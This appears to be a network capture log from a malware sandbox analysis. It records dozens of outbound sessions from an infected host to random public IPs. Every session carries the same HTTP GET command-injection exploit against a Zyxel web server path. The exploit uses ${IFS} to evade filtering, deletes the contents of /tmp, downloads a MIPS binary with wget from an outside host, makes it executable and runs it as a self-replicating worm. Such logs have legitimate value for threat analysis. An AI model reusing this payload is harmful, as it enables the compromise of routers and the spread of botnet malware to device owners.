                              Mar 31, 2024 08:41:04.481441021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              486192.168.2.134662269.64.62.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481498957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              487192.168.2.133774632.199.32.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481523037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              488192.168.2.1360396114.38.45.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481556892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              489192.168.2.1359334151.203.211.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481616020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              490192.168.2.1346650121.58.234.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481642962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              491192.168.2.1334794122.122.160.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481681108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              492192.168.2.1340484199.52.43.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481733084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              493192.168.2.1339124149.245.230.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481770992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              494192.168.2.133488239.186.227.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481822968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              495192.168.2.1345554122.125.252.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481848001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              496192.168.2.134701249.52.169.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481897116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              497192.168.2.1354698172.86.209.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481930017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              498192.168.2.1340396102.48.102.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.481976986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              499192.168.2.135615413.143.184.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482007027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              500192.168.2.1351766183.8.23.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482052088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              501192.168.2.135736299.18.39.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482068062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              502192.168.2.134377847.133.81.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482120991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              503192.168.2.1338432202.52.155.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482161045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              504192.168.2.135768072.78.122.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482207060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              505192.168.2.134173420.130.77.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482256889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              506192.168.2.1335540148.44.62.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482286930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              507192.168.2.1345750170.22.116.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482326984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              508192.168.2.1350266182.83.80.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482355118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              509192.168.2.135540236.174.254.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482419968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              510192.168.2.1344024150.187.217.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482443094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              511192.168.2.1355920135.135.2.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482492924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              512192.168.2.1332840134.140.138.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482517004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              513192.168.2.13341061.217.129.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482584000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              514192.168.2.134645295.170.3.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482604980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              515192.168.2.1335220141.163.60.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482642889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              516192.168.2.133536244.172.143.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482691050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              517192.168.2.1349812223.91.218.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482752085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              518192.168.2.13600629.177.217.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482812881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              519192.168.2.135092425.5.56.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482834101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              520192.168.2.1352830155.82.162.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482871056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              521192.168.2.1334306223.153.208.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482920885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              522192.168.2.1343198181.21.120.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.482971907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              523192.168.2.1341666185.112.202.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483001947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              524192.168.2.1360656195.120.233.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483038902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              525192.168.2.133711253.191.158.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483088017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              526192.168.2.134479237.119.48.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483113050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              527192.168.2.1347526104.93.171.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483184099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              528192.168.2.134395637.203.141.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483223915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              529192.168.2.1338416130.47.24.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483263016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              530192.168.2.135936297.220.162.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483325958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              531192.168.2.1345478169.90.244.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483356953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              532192.168.2.1341162197.60.163.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483412981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              533192.168.2.1358492105.57.82.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483438015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              534192.168.2.1360584189.137.227.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483480930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              535192.168.2.13366262.131.86.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483520985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              536192.168.2.1349294187.160.78.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483556032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              537192.168.2.134547270.75.21.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483591080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              538192.168.2.1333246148.155.120.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483623981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              539192.168.2.1352978123.157.48.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483697891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              540192.168.2.135311620.38.183.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483726025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              541192.168.2.134902612.236.188.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483773947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              542192.168.2.1355946184.36.182.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483819962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              543192.168.2.135729219.69.24.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483863115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              544192.168.2.133663223.58.110.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483908892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              545192.168.2.1333122107.35.232.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483957052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              546192.168.2.1359064110.211.202.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.483999968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              547192.168.2.1356874193.97.130.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484049082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              548192.168.2.1338688171.244.204.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484081984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              549192.168.2.135429684.83.236.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484137058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              550192.168.2.13346924.27.168.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484170914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              551192.168.2.135573640.164.115.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484209061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              552192.168.2.1336846202.65.124.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484241009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              553192.168.2.134999423.111.123.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484297991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              554192.168.2.1360510110.209.136.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484343052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
